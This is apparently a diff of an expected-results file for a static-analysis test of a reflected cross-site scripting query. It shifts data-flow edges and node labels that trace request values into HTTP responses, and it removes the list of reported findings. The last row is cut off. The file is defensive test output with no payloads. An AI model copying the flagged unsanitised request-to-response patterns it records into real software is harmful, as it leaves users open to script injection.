-| ReflectedXss.js:74:34:74:34 | f | ReflectedXss.js:75:14:75:14 | f | provenance | | -| ReflectedXss.js:84:22:84:29 | req.body | ReflectedXss.js:84:12:84:30 | snarkdown(req.body) | provenance | | -| ReflectedXss.js:85:23:85:30 | req.body | ReflectedXss.js:85:12:85:31 | snarkdown2(req.body) | provenance | | -| ReflectedXss.js:98:30:98:37 | req.body | ReflectedXss.js:98:12:98:38 | markdow ... q.body) | provenance | | -| ReflectedXss.js:100:31:100:38 | req.body | ReflectedXss.js:100:12:100:39 | markdow ... q.body) | provenance | | -| ReflectedXss.js:103:76:103:83 | req.body | ReflectedXss.js:103:12:103:84 | markdow ... q.body) | provenance | | -| ReflectedXss.js:114:11:114:41 | queryKeys | ReflectedXss.js:116:18:116:26 | queryKeys | provenance | | -| ReflectedXss.js:114:13:114:27 | keys: queryKeys | ReflectedXss.js:114:11:114:41 | queryKeys | provenance | | -| ReflectedXss.js:116:11:116:45 | keys | ReflectedXss.js:118:50:118:53 | keys | provenance | | -| ReflectedXss.js:116:11:116:45 | keys | ReflectedXss.js:118:58:118:61 | keys | provenance | | -| ReflectedXss.js:116:18:116:26 | queryKeys | ReflectedXss.js:116:11:116:45 | keys | provenance | | -| ReflectedXss.js:116:31:116:45 | paramKeys?.keys | ReflectedXss.js:116:11:116:45 | keys | provenance | | -| ReflectedXss.js:118:11:118:61 | keyArray | ReflectedXss.js:119:25:119:32 | keyArray | provenance | | -| ReflectedXss.js:118:11:118:61 | keyArray [0] | ReflectedXss.js:119:25:119:32 | keyArray [0] | provenance | | -| ReflectedXss.js:118:49:118:54 | [keys] [0] | ReflectedXss.js:118:11:118:61 | keyArray [0] | provenance | | -| ReflectedXss.js:118:50:118:53 | keys | ReflectedXss.js:118:49:118:54 | [keys] [0] | provenance | | -| ReflectedXss.js:118:58:118:61 | keys | ReflectedXss.js:118:11:118:61 | keyArray | provenance | | -| ReflectedXss.js:119:11:119:72 | invalidKeys | ReflectedXss.js:122:33:122:43 | invalidKeys | provenance | | -| ReflectedXss.js:119:11:119:72 | invalidKeys [0] | ReflectedXss.js:122:33:122:43 | invalidKeys [0] | provenance | | -| ReflectedXss.js:119:25:119:32 | keyArray | ReflectedXss.js:119:25:119:72 | keyArra ... s(key)) | provenance | | -| ReflectedXss.js:119:25:119:32 | keyArray [0] | ReflectedXss.js:119:25:119:72 | keyArra ... s(key)) [0] | provenance | | -| ReflectedXss.js:119:25:119:72 | keyArra ... s(key)) | ReflectedXss.js:119:11:119:72 | invalidKeys | provenance | | -| ReflectedXss.js:119:25:119:72 | keyArra ... s(key)) [0] | ReflectedXss.js:119:11:119:72 | invalidKeys [0] | provenance | | -| ReflectedXss.js:122:33:122:43 | invalidKeys | ReflectedXss.js:122:33:122:54 | invalid ... n(', ') | provenance | | -| ReflectedXss.js:122:33:122:43 | invalidKeys [0] | ReflectedXss.js:122:33:122:54 | invalid ... n(', ') | provenance | | -| ReflectedXss.js:122:33:122:54 | invalid ... n(', ') | ReflectedXss.js:122:30:122:73 | `${inva ... telist` | provenance | | +| ReflectedXss.js:7:33:7:45 | req.params.id | ReflectedXss.js:7:14:7:45 | "Unknow ... rams.id | provenance | | +| ReflectedXss.js:16:31:16:39 | params.id | ReflectedXss.js:16:12:16:39 | "Unknow ... rams.id | provenance | | +| ReflectedXss.js:22:19:22:26 | req.body | ReflectedXss.js:22:12:22:27 | marked(req.body) | provenance | | +| ReflectedXss.js:29:7:32:4 | mytable | ReflectedXss.js:33:12:33:18 | mytable | provenance | | +| ReflectedXss.js:29:17:32:4 | table([ ... ce\\n ]) | ReflectedXss.js:29:7:32:4 | mytable | provenance | | +| ReflectedXss.js:31:14:31:21 | req.body | ReflectedXss.js:29:17:32:4 | table([ ... ce\\n ]) | provenance | | +| ReflectedXss.js:41:31:41:38 | req.body | ReflectedXss.js:41:12:41:39 | convert ... q.body) | provenance | | +| ReflectedXss.js:63:14:63:21 | req.body | ReflectedXss.js:63:39:63:42 | file | provenance | | +| ReflectedXss.js:63:39:63:42 | file | ReflectedXss.js:64:16:64:19 | file | provenance | | +| ReflectedXss.js:67:12:67:41 | remark( ... q.body) | ReflectedXss.js:67:12:67:52 | remark( ... tring() | provenance | | +| ReflectedXss.js:67:33:67:40 | req.body | ReflectedXss.js:67:12:67:41 | remark( ... q.body) | provenance | | +| ReflectedXss.js:71:12:71:56 | unified ... q.body) | ReflectedXss.js:71:12:71:65 | unified ... oString | provenance | | +| ReflectedXss.js:71:48:71:55 | req.body | ReflectedXss.js:71:12:71:56 | unified ... q.body) | provenance | | +| ReflectedXss.js:73:20:73:27 | req.body | ReflectedXss.js:73:34:73:34 | f | provenance | | +| ReflectedXss.js:73:34:73:34 | f | ReflectedXss.js:74:14:74:14 | f | provenance | | +| ReflectedXss.js:83:22:83:29 | req.body | ReflectedXss.js:83:12:83:30 | snarkdown(req.body) | provenance | | +| ReflectedXss.js:84:23:84:30 | req.body | ReflectedXss.js:84:12:84:31 | snarkdown2(req.body) | provenance | | +| ReflectedXss.js:97:30:97:37 | req.body | ReflectedXss.js:97:12:97:38 | markdow ... q.body) | provenance | | +| ReflectedXss.js:99:31:99:38 | req.body | ReflectedXss.js:99:12:99:39 | markdow ... q.body) | provenance | | +| ReflectedXss.js:102:76:102:83 | req.body | ReflectedXss.js:102:12:102:84 | markdow ... q.body) | provenance | | +| ReflectedXss.js:113:11:113:41 | queryKeys | ReflectedXss.js:115:18:115:26 | queryKeys | provenance | | +| ReflectedXss.js:113:13:113:27 | keys: queryKeys | ReflectedXss.js:113:11:113:41 | queryKeys | provenance | | +| ReflectedXss.js:115:11:115:45 | keys | ReflectedXss.js:117:50:117:53 | keys | provenance | | +| ReflectedXss.js:115:11:115:45 | keys | ReflectedXss.js:117:58:117:61 | keys | provenance | | +| ReflectedXss.js:115:18:115:26 | queryKeys | ReflectedXss.js:115:11:115:45 | keys | provenance | | +| ReflectedXss.js:115:31:115:45 | paramKeys?.keys | ReflectedXss.js:115:11:115:45 | keys | provenance | | +| ReflectedXss.js:117:11:117:61 | keyArray | ReflectedXss.js:118:25:118:32 | keyArray | provenance | | +| ReflectedXss.js:117:11:117:61 | keyArray [0] | ReflectedXss.js:118:25:118:32 | keyArray [0] | provenance | | +| ReflectedXss.js:117:49:117:54 | [keys] [0] | ReflectedXss.js:117:11:117:61 | keyArray [0] | provenance | | +| ReflectedXss.js:117:50:117:53 | keys | ReflectedXss.js:117:49:117:54 | [keys] [0] | provenance | | +| ReflectedXss.js:117:58:117:61 | keys | ReflectedXss.js:117:11:117:61 | keyArray | provenance | | +| ReflectedXss.js:118:11:118:72 | invalidKeys | ReflectedXss.js:121:33:121:43 | invalidKeys | provenance | | +| ReflectedXss.js:118:11:118:72 | invalidKeys [0] | ReflectedXss.js:121:33:121:43 | invalidKeys [0] | provenance | | +| ReflectedXss.js:118:25:118:32 | keyArray | ReflectedXss.js:118:25:118:72 | keyArra ... s(key)) | provenance | | +| ReflectedXss.js:118:25:118:32 | keyArray [0] | ReflectedXss.js:118:25:118:72 | keyArra ... s(key)) [0] | provenance | | +| ReflectedXss.js:118:25:118:72 | keyArra ... s(key)) | ReflectedXss.js:118:11:118:72 | invalidKeys | provenance | | +| ReflectedXss.js:118:25:118:72 | keyArra ... s(key)) [0] | ReflectedXss.js:118:11:118:72 | invalidKeys [0] | provenance | | +| ReflectedXss.js:121:33:121:43 | invalidKeys | ReflectedXss.js:121:33:121:54 | invalid ... n(', ') | provenance | | +| ReflectedXss.js:121:33:121:43 | invalidKeys [0] | ReflectedXss.js:121:33:121:54 | invalid ... n(', ') | provenance | | +| ReflectedXss.js:121:33:121:54 | invalid ... n(', ') | ReflectedXss.js:121:30:121:73 | `${inva ... telist` | provenance | | | ReflectedXssContentTypes.js:10:24:10:36 | req.params.id | ReflectedXssContentTypes.js:10:14:10:36 | "FOO: " ... rams.id | provenance | | | ReflectedXssContentTypes.js:20:24:20:36 | req.params.id | ReflectedXssContentTypes.js:20:14:20:36 | "FOO: " ... rams.id | provenance | | | ReflectedXssContentTypes.js:39:23:39:35 | req.params.id | ReflectedXssContentTypes.js:39:13:39:35 | "FOO: " ... rams.id | provenance | | @@ -147,67 +204,67 @@ edges | tst3.js:11:16:11:74 | prettie ... bel" }) | tst3.js:11:9:11:74 | code | provenance | | | tst3.js:11:32:11:39 | reg.body | tst3.js:11:16:11:74 | prettie ... bel" }) | provenance | | nodes -| ReflectedXss.js:8:14:8:45 | "Unknow ... rams.id | semmle.label | "Unknow ... rams.id | -| ReflectedXss.js:8:33:8:45 | req.params.id | semmle.label | req.params.id | -| ReflectedXss.js:17:12:17:39 | "Unknow ... rams.id | semmle.label | "Unknow ... rams.id | -| ReflectedXss.js:17:31:17:39 | params.id | semmle.label | params.id | -| ReflectedXss.js:22:12:22:19 | req.body | semmle.label | req.body | -| ReflectedXss.js:23:12:23:27 | marked(req.body) | semmle.label | marked(req.body) | -| ReflectedXss.js:23:19:23:26 | req.body | semmle.label | req.body | -| ReflectedXss.js:29:12:29:19 | req.body | semmle.label | req.body | -| ReflectedXss.js:30:7:33:4 | mytable | semmle.label | mytable | -| ReflectedXss.js:30:17:33:4 | table([ ... y]\\n ]) | semmle.label | table([ ... y]\\n ]) | -| ReflectedXss.js:32:14:32:21 | req.body | semmle.label | req.body | -| ReflectedXss.js:34:12:34:18 | mytable | semmle.label | mytable | -| ReflectedXss.js:41:12:41:19 | req.body | semmle.label | req.body | -| ReflectedXss.js:42:12:42:39 | convert ... q.body) | semmle.label | convert ... q.body) | -| ReflectedXss.js:42:31:42:38 | req.body | semmle.label | req.body | -| ReflectedXss.js:56:12:56:19 | req.body | semmle.label | req.body | -| ReflectedXss.js:64:14:64:21 | req.body | semmle.label | req.body | -| ReflectedXss.js:64:39:64:42 | file | semmle.label | file | -| ReflectedXss.js:65:16:65:19 | file | semmle.label | file | -| ReflectedXss.js:68:12:68:41 | remark( ... q.body) | semmle.label | remark( ... q.body) | -| ReflectedXss.js:68:12:68:52 | remark( ... tring() | semmle.label | remark( ... tring() | -| ReflectedXss.js:68:33:68:40 | req.body | semmle.label | req.body | -| ReflectedXss.js:72:12:72:56 | unified ... q.body) | semmle.label | unified ... q.body) | -| ReflectedXss.js:72:12:72:65 | unified ... oString | semmle.label | unified ... oString | -| ReflectedXss.js:72:48:72:55 | req.body | semmle.label | req.body | -| ReflectedXss.js:74:20:74:27 | req.body | semmle.label | req.body | -| ReflectedXss.js:74:34:74:34 | f | semmle.label | f | -| ReflectedXss.js:75:14:75:14 | f | semmle.label | f | -| ReflectedXss.js:83:12:83:19 | req.body | semmle.label | req.body | -| ReflectedXss.js:84:12:84:30 | snarkdown(req.body) | semmle.label | snarkdown(req.body) | -| ReflectedXss.js:84:22:84:29 | req.body | semmle.label | req.body | -| ReflectedXss.js:85:12:85:31 | snarkdown2(req.body) | semmle.label | snarkdown2(req.body) | -| ReflectedXss.js:85:23:85:30 | req.body | semmle.label | req.body | -| ReflectedXss.js:97:12:97:19 | req.body | semmle.label | req.body | -| ReflectedXss.js:98:12:98:38 | markdow ... q.body) | semmle.label | markdow ... q.body) | -| ReflectedXss.js:98:30:98:37 | req.body | semmle.label | req.body | -| ReflectedXss.js:100:12:100:39 | markdow ... q.body) | semmle.label | markdow ... q.body) | -| ReflectedXss.js:100:31:100:38 | req.body | semmle.label | req.body | -| ReflectedXss.js:103:12:103:84 | markdow ... q.body) | semmle.label | markdow ... q.body) | -| ReflectedXss.js:103:76:103:83 | req.body | semmle.label | req.body | -| ReflectedXss.js:110:16:110:30 | request.query.p | semmle.label | request.query.p | -| ReflectedXss.js:114:11:114:41 | queryKeys | semmle.label | queryKeys | -| ReflectedXss.js:114:13:114:27 | keys: queryKeys | semmle.label | keys: queryKeys | -| ReflectedXss.js:116:11:116:45 | keys | semmle.label | keys | -| ReflectedXss.js:116:18:116:26 | queryKeys | semmle.label | queryKeys | -| ReflectedXss.js:116:31:116:45 | paramKeys?.keys | semmle.label | paramKeys?.keys | -| ReflectedXss.js:118:11:118:61 | keyArray | semmle.label | keyArray | -| ReflectedXss.js:118:11:118:61 | keyArray [0] | semmle.label | keyArray [0] | -| ReflectedXss.js:118:49:118:54 | [keys] [0] | semmle.label | [keys] [0] | -| ReflectedXss.js:118:50:118:53 | keys | semmle.label | keys | -| ReflectedXss.js:118:58:118:61 | keys | semmle.label | keys | -| ReflectedXss.js:119:11:119:72 | invalidKeys | semmle.label | invalidKeys | -| ReflectedXss.js:119:11:119:72 | invalidKeys [0] | semmle.label | invalidKeys [0] | -| ReflectedXss.js:119:25:119:32 | keyArray | semmle.label | keyArray | -| ReflectedXss.js:119:25:119:32 | keyArray [0] | semmle.label | keyArray [0] | -| ReflectedXss.js:119:25:119:72 | keyArra ... s(key)) | semmle.label | keyArra ... s(key)) | -| ReflectedXss.js:119:25:119:72 | keyArra ... s(key)) [0] | semmle.label | keyArra ... s(key)) [0] | -| ReflectedXss.js:122:30:122:73 | `${inva ... telist` | semmle.label | `${inva ... telist` | -| ReflectedXss.js:122:33:122:43 | invalidKeys | semmle.label | invalidKeys | -| ReflectedXss.js:122:33:122:43 | invalidKeys [0] | semmle.label | invalidKeys [0] | -| ReflectedXss.js:122:33:122:54 | invalid ... n(', ') | semmle.label | invalid ... n(', ') | +| ReflectedXss.js:7:14:7:45 | "Unknow ... rams.id | semmle.label | "Unknow ... rams.id | +| ReflectedXss.js:7:33:7:45 | req.params.id | semmle.label | req.params.id | +| ReflectedXss.js:16:12:16:39 | "Unknow ... rams.id | semmle.label | "Unknow ... rams.id | +| ReflectedXss.js:16:31:16:39 | params.id | semmle.label | params.id | +| ReflectedXss.js:21:12:21:19 | req.body | semmle.label | req.body | +| ReflectedXss.js:22:12:22:27 | marked(req.body) | semmle.label | marked(req.body) | +| ReflectedXss.js:22:19:22:26 | req.body | semmle.label | req.body | +| ReflectedXss.js:28:12:28:19 | req.body | semmle.label | req.body | +| ReflectedXss.js:29:7:32:4 | mytable | semmle.label | mytable | +| ReflectedXss.js:29:17:32:4 | table([ ... ce\\n ]) | semmle.label | table([ ... ce\\n ]) | +| ReflectedXss.js:31:14:31:21 | req.body | semmle.label | req.body | +| ReflectedXss.js:33:12:33:18 | mytable | semmle.label | mytable | +| ReflectedXss.js:40:12:40:19 | req.body | semmle.label | req.body | +| ReflectedXss.js:41:12:41:39 | convert ... q.body) | semmle.label | convert ... q.body) | +| ReflectedXss.js:41:31:41:38 | req.body | semmle.label | req.body | +| ReflectedXss.js:55:12:55:19 | req.body | semmle.label | req.body | +| ReflectedXss.js:63:14:63:21 | req.body | semmle.label | req.body | +| ReflectedXss.js:63:39:63:42 | file | semmle.label | file | +| ReflectedXss.js:64:16:64:19 | file | semmle.label | file | +| ReflectedXss.js:67:12:67:41 | remark( ... q.body) | semmle.label | remark( ... q.body) | +| ReflectedXss.js:67:12:67:52 | remark( ... tring() | semmle.label | remark( ... tring() | +| ReflectedXss.js:67:33:67:40 | req.body | semmle.label | req.body | +| ReflectedXss.js:71:12:71:56 | unified ... q.body) | semmle.label | unified ... q.body) | +| ReflectedXss.js:71:12:71:65 | unified ... oString | semmle.label | unified ... oString | +| ReflectedXss.js:71:48:71:55 | req.body | semmle.label | req.body | +| ReflectedXss.js:73:20:73:27 | req.body | semmle.label | req.body | +| ReflectedXss.js:73:34:73:34 | f | semmle.label | f | +| ReflectedXss.js:74:14:74:14 | f | semmle.label | f | +| ReflectedXss.js:82:12:82:19 | req.body | semmle.label | req.body | +| ReflectedXss.js:83:12:83:30 | snarkdown(req.body) | semmle.label | snarkdown(req.body) | +| ReflectedXss.js:83:22:83:29 | req.body | semmle.label | req.body | +| ReflectedXss.js:84:12:84:31 | snarkdown2(req.body) | semmle.label | snarkdown2(req.body) | +| ReflectedXss.js:84:23:84:30 | req.body | semmle.label | req.body | +| ReflectedXss.js:96:12:96:19 | req.body | semmle.label | req.body | +| ReflectedXss.js:97:12:97:38 | markdow ... q.body) | semmle.label | markdow ... q.body) | +| ReflectedXss.js:97:30:97:37 | req.body | semmle.label | req.body | +| ReflectedXss.js:99:12:99:39 | markdow ... q.body) | semmle.label | markdow ... q.body) | +| ReflectedXss.js:99:31:99:38 | req.body | semmle.label | req.body | +| ReflectedXss.js:102:12:102:84 | markdow ... q.body) | semmle.label | markdow ... q.body) | +| ReflectedXss.js:102:76:102:83 | req.body | semmle.label | req.body | +| ReflectedXss.js:109:16:109:30 | request.query.p | semmle.label | request.query.p | +| ReflectedXss.js:113:11:113:41 | queryKeys | semmle.label | queryKeys | +| ReflectedXss.js:113:13:113:27 | keys: queryKeys | semmle.label | keys: queryKeys | +| ReflectedXss.js:115:11:115:45 | keys | semmle.label | keys | +| ReflectedXss.js:115:18:115:26 | queryKeys | semmle.label | queryKeys | +| ReflectedXss.js:115:31:115:45 | paramKeys?.keys | semmle.label | paramKeys?.keys | +| ReflectedXss.js:117:11:117:61 | keyArray | semmle.label | keyArray | +| ReflectedXss.js:117:11:117:61 | keyArray [0] | semmle.label | keyArray [0] | +| ReflectedXss.js:117:49:117:54 | [keys] [0] | semmle.label | [keys] [0] | +| ReflectedXss.js:117:50:117:53 | keys | semmle.label | keys | +| ReflectedXss.js:117:58:117:61 | keys | semmle.label | keys | +| ReflectedXss.js:118:11:118:72 | invalidKeys | semmle.label | invalidKeys | +| ReflectedXss.js:118:11:118:72 | invalidKeys [0] | semmle.label | invalidKeys [0] | +| ReflectedXss.js:118:25:118:32 | keyArray | semmle.label | keyArray | +| ReflectedXss.js:118:25:118:32 | keyArray [0] | semmle.label | keyArray [0] | +| ReflectedXss.js:118:25:118:72 | keyArra ... s(key)) | semmle.label | keyArra ... s(key)) | +| ReflectedXss.js:118:25:118:72 | keyArra ... s(key)) [0] | semmle.label | keyArra ... s(key)) [0] | +| ReflectedXss.js:121:30:121:73 | `${inva ... telist` | semmle.label | `${inva ... telist` | +| ReflectedXss.js:121:33:121:43 | invalidKeys | semmle.label | invalidKeys | +| ReflectedXss.js:121:33:121:43 | invalidKeys [0] | semmle.label | invalidKeys [0] | +| ReflectedXss.js:121:33:121:54 | invalid ... n(', ') | semmle.label | invalid ... n(', ') | | ReflectedXssContentTypes.js:10:14:10:36 | "FOO: " ... rams.id | semmle.label | "FOO: " ... rams.id | | ReflectedXssContentTypes.js:10:24:10:36 | req.params.id | semmle.label | req.params.id | | ReflectedXssContentTypes.js:20:14:20:36 | "FOO: " ... rams.id | semmle.label | "FOO: " ... rams.id | @@ -341,60 +398,3 @@ nodes | tst3.js:12:12:12:15 | code | semmle.label | code | subpaths | ReflectedXssGood3.js:139:24:139:26 | url | ReflectedXssGood3.js:68:22:68:26 | value | ReflectedXssGood3.js:108:10:108:23 | parts.join('') | ReflectedXssGood3.js:139:12:139:27 | escapeHtml3(url) | -#select -| ReflectedXss.js:8:14:8:45 | "Unknow ... rams.id | ReflectedXss.js:8:33:8:45 | req.params.id | ReflectedXss.js:8:14:8:45 | "Unknow ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:8:33:8:45 | req.params.id | user-provided value | -| ReflectedXss.js:17:12:17:39 | "Unknow ... rams.id | ReflectedXss.js:17:31:17:39 | params.id | ReflectedXss.js:17:12:17:39 | "Unknow ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:17:31:17:39 | params.id | user-provided value | -| ReflectedXss.js:22:12:22:19 | req.body | ReflectedXss.js:22:12:22:19 | req.body | ReflectedXss.js:22:12:22:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:22:12:22:19 | req.body | user-provided value | -| ReflectedXss.js:23:12:23:27 | marked(req.body) | ReflectedXss.js:23:19:23:26 | req.body | ReflectedXss.js:23:12:23:27 | marked(req.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:23:19:23:26 | req.body | user-provided value | -| ReflectedXss.js:29:12:29:19 | req.body | ReflectedXss.js:29:12:29:19 | req.body | ReflectedXss.js:29:12:29:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:29:12:29:19 | req.body | user-provided value | -| ReflectedXss.js:34:12:34:18 | mytable | ReflectedXss.js:32:14:32:21 | req.body | ReflectedXss.js:34:12:34:18 | mytable | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:32:14:32:21 | req.body | user-provided value | -| ReflectedXss.js:41:12:41:19 | req.body | ReflectedXss.js:41:12:41:19 | req.body | ReflectedXss.js:41:12:41:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:41:12:41:19 | req.body | user-provided value | -| ReflectedXss.js:42:12:42:39 | convert ... q.body) | ReflectedXss.js:42:31:42:38 | req.body | ReflectedXss.js:42:12:42:39 | convert ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:42:31:42:38 | req.body | user-provided value | -| ReflectedXss.js:56:12:56:19 | req.body | ReflectedXss.js:56:12:56:19 | req.body | ReflectedXss.js:56:12:56:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:56:12:56:19 | req.body | user-provided value | -| ReflectedXss.js:65:16:65:19 | file | ReflectedXss.js:64:14:64:21 | req.body | ReflectedXss.js:65:16:65:19 | file | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:64:14:64:21 | req.body | user-provided value | -| ReflectedXss.js:68:12:68:52 | remark( ... tring() | ReflectedXss.js:68:33:68:40 | req.body | ReflectedXss.js:68:12:68:52 | remark( ... tring() | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:68:33:68:40 | req.body | user-provided value | -| ReflectedXss.js:72:12:72:65 | unified ... oString | ReflectedXss.js:72:48:72:55 | req.body | ReflectedXss.js:72:12:72:65 | unified ... oString | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:72:48:72:55 | req.body | user-provided value | -| ReflectedXss.js:75:14:75:14 | f | ReflectedXss.js:74:20:74:27 | req.body | ReflectedXss.js:75:14:75:14 | f | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:74:20:74:27 | req.body | user-provided value | -| ReflectedXss.js:83:12:83:19 | req.body | ReflectedXss.js:83:12:83:19 | req.body | ReflectedXss.js:83:12:83:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:83:12:83:19 | req.body | user-provided value | -| ReflectedXss.js:84:12:84:30 | snarkdown(req.body) | ReflectedXss.js:84:22:84:29 | req.body | ReflectedXss.js:84:12:84:30 | snarkdown(req.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:84:22:84:29 | req.body | user-provided value | -| ReflectedXss.js:85:12:85:31 | snarkdown2(req.body) | ReflectedXss.js:85:23:85:30 | req.body | ReflectedXss.js:85:12:85:31 | snarkdown2(req.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:85:23:85:30 | req.body | user-provided value | -| ReflectedXss.js:97:12:97:19 | req.body | ReflectedXss.js:97:12:97:19 | req.body | ReflectedXss.js:97:12:97:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:97:12:97:19 | req.body | user-provided value | -| ReflectedXss.js:98:12:98:38 | markdow ... q.body) | ReflectedXss.js:98:30:98:37 | req.body | ReflectedXss.js:98:12:98:38 | markdow ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:98:30:98:37 | req.body | user-provided value | -| ReflectedXss.js:100:12:100:39 | markdow ... q.body) | ReflectedXss.js:100:31:100:38 | req.body | ReflectedXss.js:100:12:100:39 | markdow ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:100:31:100:38 | req.body | user-provided value | -| ReflectedXss.js:103:12:103:84 | markdow ... q.body) | ReflectedXss.js:103:76:103:83 | req.body | ReflectedXss.js:103:12:103:84 | markdow ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:103:76:103:83 | req.body | user-provided value | -| ReflectedXss.js:110:16:110:30 | request.query.p | ReflectedXss.js:110:16:110:30 | request.query.p | ReflectedXss.js:110:16:110:30 | request.query.p | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:110:16:110:30 | request.query.p | user-provided value | -| ReflectedXss.js:122:30:122:73 | `${inva ... telist` | ReflectedXss.js:114:13:114:27 | keys: queryKeys | ReflectedXss.js:122:30:122:73 | `${inva ... telist` | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:114:13:114:27 | keys: queryKeys | user-provided value | -| ReflectedXss.js:122:30:122:73 | `${inva ... telist` | ReflectedXss.js:116:31:116:45 | paramKeys?.keys | ReflectedXss.js:122:30:122:73 | `${inva ... telist` | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:116:31:116:45 | paramKeys?.keys | user-provided value | -| ReflectedXssContentTypes.js:10:14:10:36 | "FOO: " ... rams.id | ReflectedXssContentTypes.js:10:24:10:36 | req.params.id | ReflectedXssContentTypes.js:10:14:10:36 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXssContentTypes.js:10:24:10:36 | req.params.id | user-provided value | -| ReflectedXssContentTypes.js:20:14:20:36 | "FOO: " ... rams.id | ReflectedXssContentTypes.js:20:24:20:36 | req.params.id | ReflectedXssContentTypes.js:20:14:20:36 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXssContentTypes.js:20:24:20:36 | req.params.id | user-provided value | -| ReflectedXssContentTypes.js:39:13:39:35 | "FOO: " ... rams.id | ReflectedXssContentTypes.js:39:23:39:35 | req.params.id | ReflectedXssContentTypes.js:39:13:39:35 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXssContentTypes.js:39:23:39:35 | req.params.id | user-provided value | -| ReflectedXssContentTypes.js:70:12:70:34 | "FOO: " ... rams.id | ReflectedXssContentTypes.js:70:22:70:34 | req.params.id | ReflectedXssContentTypes.js:70:12:70:34 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXssContentTypes.js:70:22:70:34 | req.params.id | user-provided value | -| ReflectedXssGood3.js:139:12:139:27 | escapeHtml3(url) | ReflectedXssGood3.js:135:15:135:27 | req.params.id | ReflectedXssGood3.js:139:12:139:27 | escapeHtml3(url) | Cross-site scripting vulnerability due to a $@. | ReflectedXssGood3.js:135:15:135:27 | req.params.id | user-provided value | -| etherpad.js:11:12:11:19 | response | etherpad.js:9:16:9:30 | req.query.jsonp | etherpad.js:11:12:11:19 | response | Cross-site scripting vulnerability due to a $@. | etherpad.js:9:16:9:30 | req.query.jsonp | user-provided value | -| formatting.js:6:14:6:47 | util.fo ... , evil) | formatting.js:4:16:4:29 | req.query.evil | formatting.js:6:14:6:47 | util.fo ... , evil) | Cross-site scripting vulnerability due to a $@. | formatting.js:4:16:4:29 | req.query.evil | user-provided value | -| formatting.js:7:14:7:53 | require ... , evil) | formatting.js:4:16:4:29 | req.query.evil | formatting.js:7:14:7:53 | require ... , evil) | Cross-site scripting vulnerability due to a $@. | formatting.js:4:16:4:29 | req.query.evil | user-provided value | -| live-server.js:6:13:6:50 | ` ... /html>` | live-server.js:4:21:4:27 | req.url | live-server.js:6:13:6:50 | ` ... /html>` | Cross-site scripting vulnerability due to a $@. | live-server.js:4:21:4:27 | req.url | user-provided value | -| live-server.js:12:13:12:50 | ` ... /html>` | live-server.js:10:21:10:27 | req.url | live-server.js:12:13:12:50 | ` ... /html>` | Cross-site scripting vulnerability due to a $@. | live-server.js:10:21:10:27 | req.url | user-provided value | -| pages/Next.jsx:8:13:8:19 | req.url | pages/Next.jsx:8:13:8:19 | req.url | pages/Next.jsx:8:13:8:19 | req.url | Cross-site scripting vulnerability due to a $@. | pages/Next.jsx:8:13:8:19 | req.url | user-provided value | -| pages/Next.jsx:15:13:15:19 | req.url | pages/Next.jsx:15:13:15:19 | req.url | pages/Next.jsx:15:13:15:19 | req.url | Cross-site scripting vulnerability due to a $@. | pages/Next.jsx:15:13:15:19 | req.url | user-provided value | -| pages/api/myapi.js:2:14:2:20 | req.url | pages/api/myapi.js:2:14:2:20 | req.url | pages/api/myapi.js:2:14:2:20 | req.url | Cross-site scripting vulnerability due to a $@. | pages/api/myapi.js:2:14:2:20 | req.url | user-provided value | -| partial.js:10:14:10:18 | x + y | partial.js:13:42:13:48 | req.url | partial.js:10:14:10:18 | x + y | Cross-site scripting vulnerability due to a $@. | partial.js:13:42:13:48 | req.url | user-provided value | -| partial.js:19:14:19:18 | x + y | partial.js:22:51:22:57 | req.url | partial.js:19:14:19:18 | x + y | Cross-site scripting vulnerability due to a $@. | partial.js:22:51:22:57 | req.url | user-provided value | -| partial.js:28:14:28:18 | x + y | partial.js:31:47:31:53 | req.url | partial.js:28:14:28:18 | x + y | Cross-site scripting vulnerability due to a $@. | partial.js:31:47:31:53 | req.url | user-provided value | -| partial.js:37:14:37:18 | x + y | partial.js:40:43:40:49 | req.url | partial.js:37:14:37:18 | x + y | Cross-site scripting vulnerability due to a $@. | partial.js:40:43:40:49 | req.url | user-provided value | -| promises.js:6:25:6:25 | x | promises.js:5:44:5:57 | req.query.data | promises.js:6:25:6:25 | x | Cross-site scripting vulnerability due to a $@. | promises.js:5:44:5:57 | req.query.data | user-provided value | -| tst2.js:7:12:7:12 | p | tst2.js:6:9:6:9 | p | tst2.js:7:12:7:12 | p | Cross-site scripting vulnerability due to a $@. | tst2.js:6:9:6:9 | p | user-provided value | -| tst2.js:8:12:8:12 | r | tst2.js:6:12:6:15 | q: r | tst2.js:8:12:8:12 | r | Cross-site scripting vulnerability due to a $@. | tst2.js:6:12:6:15 | q: r | user-provided value | -| tst2.js:18:12:18:12 | p | tst2.js:14:9:14:9 | p | tst2.js:18:12:18:12 | p | Cross-site scripting vulnerability due to a $@. | tst2.js:14:9:14:9 | p | user-provided value | -| tst2.js:21:14:21:14 | p | tst2.js:14:9:14:9 | p | 